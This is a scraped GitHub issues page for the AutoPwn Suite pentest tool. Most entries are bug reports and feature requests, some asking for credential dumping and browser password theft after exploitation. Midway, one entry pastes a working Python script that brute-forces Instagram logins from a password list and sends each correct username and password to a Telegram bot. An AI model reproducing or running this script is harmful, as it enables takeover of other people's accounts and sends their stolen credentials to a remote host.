gamehunterkaan / autopwn-suite Goto Github PK

fix: from time import sleep

Hello,
New to AutoPwn, Ubuntu 22.04.1. Running in a venv environment. When it starts the web application scanning it crashes with a self-signed cert error. In the use case I have all devices use the manufacturer's self-signed cert. I looked for a switch to disable the cert check but I didn't see one.

I can supply any information needed to help troubleshoot.

Thanks!
Michael

self-signed.txt

Autopwn Suite version 2.0.0

Distro and machine info:

OS: Ubuntu 20.04.4 LTS x86_64
Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-6.1)
Kernel: 5.13.0-51-generic
Uptime: 1 day, 9 mins
Packages: 1919 (dpkg), 7 (snap)
Shell: bash 5.0.17
Resolution: 1024x768
Terminal: /dev/pts/0
CPU: Common KVM (1) @ 3.392GHz
GPU: 00:02.0 Vendor 1234 Device 1111
Memory: 952MiB / 3926MiB

Python 3.8.10 Traceback:

Traceback (most recent call last):
File "/usr/local/bin/autopwn-suite", line 8, in
sys.exit(main())
File "/usr/local/lib/python3.8/dist-packages/autopwn_suite/autopwn.py", line 104, in main
StartScanning(
File "/usr/local/lib/python3.8/dist-packages/autopwn_suite/autopwn.py", line 55, in StartScanning
GetExploitsFromArray(VulnsArray, log, console, host)
File "/usr/local/lib/python3.8/dist-packages/autopwn_suite/modules/getexploits.py", line 160, in GetExploitsFromArray
GetExploitAsFile(vulnerability, log, console)
File "/usr/local/lib/python3.8/dist-packages/autopwn_suite/modules/getexploits.py", line 108, in GetExploitAsFile
Exploits = GetExploitInfo(CVE, log)
File "/usr/local/lib/python3.8/dist-packages/autopwn_suite/modules/getexploits.py", line 26, in GetExploitInfo
user_agent = next(random_user_agent(log))
File "/usr/local/lib/python3.8/dist-packages/autopwn_suite/modules/random_user_agent.py", line 13, in random_user_agent
def fetch_data() -> list[str]:
TypeError: 'type' object is not subscriptable

Can't scan target. It keeps scanning my own network instead whenever I enter target's ip.

Could you please add a "Requirements" File to the project?
At the moment I get an error when either install via pip or "git clone"

ImportError: cannot import name 'JSONDecodeError' from 'requests.exceptions' (/usr/local/lib/python3.9/dist-packages/requests/exceptions.py)

[21:28:59] INFO [+] Searching vulnerability database for 2 keyword(s) ... logger.py:55
[=== ] Searching vulnerability database for OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 ...[21:29:03] ERROR [-] cannot access local variable 'data' where it is not associated with a value logger.py:57
[== ] Searching vulnerability database for nginx 1.18.0 ...[21:29:07] ERROR [-] cannot access local variable 'data' where it is not associated with a value logger.py:57

Can not run the app under Windows environment

To Reproduce
Steps to reproduce the behavior:

1. Run the coe 'python autopwn.py'
2. See error '[!] ImportError: cannot import name 'getuid' from 'os' (C:\Program Files\Python\lib\os.py)'

Expected behavior
Run it without errors.

Desktop (please complete the following information):

• OS: Microsoft Windows
• Version 21H2

About the same problem
os.getuid() not available in windows 10

Describe the bug
Error while script is trying test web applications, I tried on different os and on NetHunter:

Testing web application on 192.168.1.101...

Traceback (most recent call last):
File "/root/AutoPWN-Suite/autopwn.py", line 524, in
main()
File "/root/AutoPWN-Suite/autopwn.py", line 516, in main
FurtherEnumuration(OnlineHosts)
File "/root/AutoPWN-Suite/autopwn.py", line 482, in FurtherEnumuration
webvuln(host)
File "/root/AutoPWN-Suite/modules/web/webvuln.py", line 33, in webvuln
urls = crawl(target_url)
File "/root/AutoPWN-Suite/modules/web/crawler.py", line 14, in crawl
if not url.startswith('http'):
AttributeError: 'NoneType' object has no attribute 'startswith'

To Reproduce
Steps to reproduce the behavior:

1. run python3 autopwn.py -y

Expected behavior
Web apllication testing

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

• OS: Kali Linux & ParrotSec & Nethunter
• Version: Latest

Additional context
Add any other context about the problem here.

Describe the bug
"TypeError: 'type' object is not subscriptable" in utils.py

To Reproduce
Steps to reproduce the behavior:

1. Execute the .py

Screenshots

Desktop (please complete the following information):

• OS: Debian
• Version : 10
• Python 3

Hey, love this app and it worked in Ubuntu until recently and I'm getting banner errors now.

I'll clip and paste the error as soon as my encryption is done, but I didn't update the repo, just got an OS update and it stopped working.

hi how to fix error code in kali linux ===> (Error: (%d) format: a real number is required, not str)
go to path /home/name/name/Autopwn/modules/scanner.py
& change this %d to %s
thanks GamehunterKaan for AutoPwn-Suite

Describe the bug
Runtime error when running the Python file on Windows 11. Can be observed through Command Prompt, %windir%/System32/cmd.exe or Windows Powershell

AutoPWN-Suite\modules\utils.py", line 756, in check_nmap
    input(f"Install Nmap on your system ({distro.id()})? ").lower() != "n"
                                          ^^^^^^
NameError: name 'distro' is not defined

To Reproduce
Steps to reproduce the behavior:

1. Don't have nmap installed I guess
2. Clone the repository
3. Change directory and install requirements.txt using pip install -r requirements.txt
4. Run python autopwn.py -t localhost with or without the argument

Desktop

• OS: Windows 11
• Python: 3.11.2

Describe the bug
I clone this project git on my machine and I've this message when i use autopwn-suite :

[13:06:45] WARNING  [*] Your version of AutoPWN Suite is outdated. Update   logger.py:59
                    is advised. 

I checked the version and i've this :

agrestic@blade15 | ~ | git | AutoPWN-Suite | main 
$ sudo python3 autopwn.py --version
AutoPWN Suite v2.1.1

I switched to the commit with tags on le the latest version v2.1.2 and I've this :

agrestic@blade15 | ~ | git | AutoPWN-Suite | ⚓v2.1.2
$ sudo python3 autopwn.py --version
AutoPWN Suite v2.1.1

Thanks in advance for your replies
I very like this tool

Is your feature request related to a problem? Please describe.
No

Describe the solution you'd like
After the first successful exploitation could you switch to credential dumping as once you gain credentials it's a lot more effective than attempting to use an exploit.

Describe alternatives you've considered

Additional context
Example tools for credential dumping:
https://github.com/skelsec/pypykatz
https://github.com/gentilkiwi/mimikatz
https://github.com/Hackndo/lsassy

Not possible to install package on Kali Linux (also on Debian), because of zstd compression format.

To Reproduce
Steps to reproduce the behavior:

1. Download the package
2. Install it by dpkg -i
3. get "dpkg-deb: error: archive 'autopwn-suite_1.0.4.deb' uses unknown compression for member 'control.tar.zst', giving up"

Expected behavior
Package fully installed

Desktop (please complete the following information):
OS:

1. Kali Linux 2022.2 (Rolling)
2. Debian Bullseye

Additional context
autopwn-suite_1.0.4.deb: Debian binary package (format 2.0), with control.tar.zs, data compression zst
Perhaps zstd is supported on Ubuntu derrivatives

Is your feature request related to a problem? Please describe.
many security projects got now the possibility to stream (json) resut on stdout, in realtime (see amass). --json [path/to/log.json || - // stdout

Describe the solution you'd like
new command line options --json -

Describe alternatives you've considered
none

Additional context
docker run autopwn-suite

ty !

Describe the bug
Not the good attribute i think ?
" AttributeError: 'Namespace' object has no attribute 'reportwebhook'. Did you mean: 'report_webhook'? "
To Reproduce
Steps to reproduce the behavior:

1. autopwn.py -y -a xxxxxxx -hf list.txt -st ping -o result.html -ot html -rp webhook -rpw https://discord.com/api/webhooks/xxxxxx

Screenshots

Desktop (please complete the following information):

• OS: Debian 10
• Python : 3.10.0

import requests
import time
import random
import string
import webbrowser

#colors
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
MAGENTA = '\033[35m'
CYAN = '\033[36m'
WHITE = '\033[37m'
RESET = '\033[39m'

session = requests.Session()
webbrowser.open('https://instagram.com/qcs.i8?igshid=YmMyMTA2M2Y=')

user_name = input(f'''Enter Account Name ({YELLOW}?{WHITE}){WHITE} : ''')

id_tele = input(f'''Enter Your Telegram ID ({YELLOW}?{WHITE}){WHITE} : ''')

token_bot = input(f'''Enter Your Telegram Token bot ({YELLOW}?{WHITE}){WHITE} : ''')

pass_word = input(f'''Enter Your Password List Name ({YELLOW}?{WHITE}){WHITE} : ''')

file = open(f"{pass_word}", "r")

def GuessInstagram():
while True:

    pass_word = file.readline().split('\n')[0]

    url = "https://www.instagram.com/accounts/login/ajax/"

    headers = {
        'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) InspectBrowser',
        'X-CSRFToken': 'TNZhAQCH8OaoK8F5oZNHJ5ZrkAlSmcMM',
        'X-Instagram-AJAX': 'cec4fe0d7efei',
        'X-IG-App-ID': '936619743392459'
    }

    tim = str(time.time()).split(".")[1]

    data = {
        'username': f'{user_name}',
        'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{tim}:{pass_word}',
        'queryParams': {},
        'optIntoOneTap': 'false'
    }



    req = session.post(url, headers=headers, data=data).text


    if ('"authenticated":true') in req:
        print(GREEN+f'User:{user_name}Pass:{pass_word} Correct Password ✅')



        telegram_sand =(f'https://api.telegram.org/bot{token_bot}/sendMessage?chat_id={id_tele}&text=Correct Password ✔\nUser:{user_name}Pass:{pass_word}')

        req = requests.post(telegram_sand)


    
    elif '"checkpoint_url"' in req:
        print(YELLOW+'Temporary Band or Secure Account ):')



    else:
        print(RED+f'User:{user_name}Pass:{pass_word} Wrong Password  ')
    
    time.sleep(10)

GuessInstagram()

[ ===] Searching vulnerability database for Postfix smtpd ...[08:32:08] ERROR [-] cannot access local variable 'data' where it is not associated with a value logger.py:57
[= ] Searching vulnerability database for NLnet Labs NSD ...[08:32:16] ERROR [-] cannot access local variable 'data' where it is not associated with a value logger.py:57

I think tor option to hide your identity would be cool

Describe the bug
Can't scan ports from discovered hosts.

To Reproduce
Steps to reproduce the behavior:
start the program using last version from repository or from deb file (v1.5.1)
Chose one IP that is alive and have open ports
then wait and i see this:

Expected behavior
To see open ports

Desktop (please complete the following information):

• OS: Parrot OS

Im not being able to install the tool on termux. Is this tool able to install on it?

And the google cloud shell does not allow to scan the local network

Hey there, I cant find the api.txt file to insert the NVD API key into

Describe the bug
Anything barely works in windows.

To Reproduce
Steps to reproduce the behavior:

1. py autopwn.py
2. See error

Expected behavior
Run without any errors.

Screenshots

Desktop (please complete the following information):

• OS: Windows

• Version : Latest

Additional context
I hate windows.

I was wondering of there was or is there plans to be able to store the API within the tool, somewhere in a config file maybe and it would just use it automatically? Or have you thought about just one API key for the whole tool? Thanks for for your work, so far it's been working great.

hi,
i try it using google cloud shell, but you don't give the process, so i check if there is any autopwn-suite "exe" file, but no

_user@cloudshell:~/cloudshell_open/AutoPWN-Suite$ pwd
/home/user/cloudshell_open/AutoPWN-Suite
nocktames@cloudshell:~/cloudshell_open/AutoPWN-Suite$ find . -iname autopwn
user@cloudshell:~/cloudshell_open/AutoPWN-Suite$_

so there is any process ?

Describe the bug
In MacOs (Monterey) Terminal I get this error:

Traceback (most recent call last):
File "autopwn.py", line 5, in
from modules.banners import print_banner
File "/Users/xxx/AutoPWN-Suite/modules/banners.py", line 5, in
from modules.utils import get_terminal_width
File "/Users/xxx/AutoPWN-Suite/modules/utils.py", line 499, in
def UserConfirmation() -> tuple[bool, bool, bool]:
TypeError: 'type' object is not subscriptable

To Reproduce
sudo python3 autopwn.py -y

Desktop (please complete the following information):

• OS: Monterey
• Version 12.5

Is your feature request related to a problem? Please describe.
Nope

Describe the solution you'd like
Automatically extracting browser passwords after exploitation of windows device.

Describe alternatives you've considered
HackBrowserData Project

Additional context
https://github.com/moonD4rk/HackBrowserData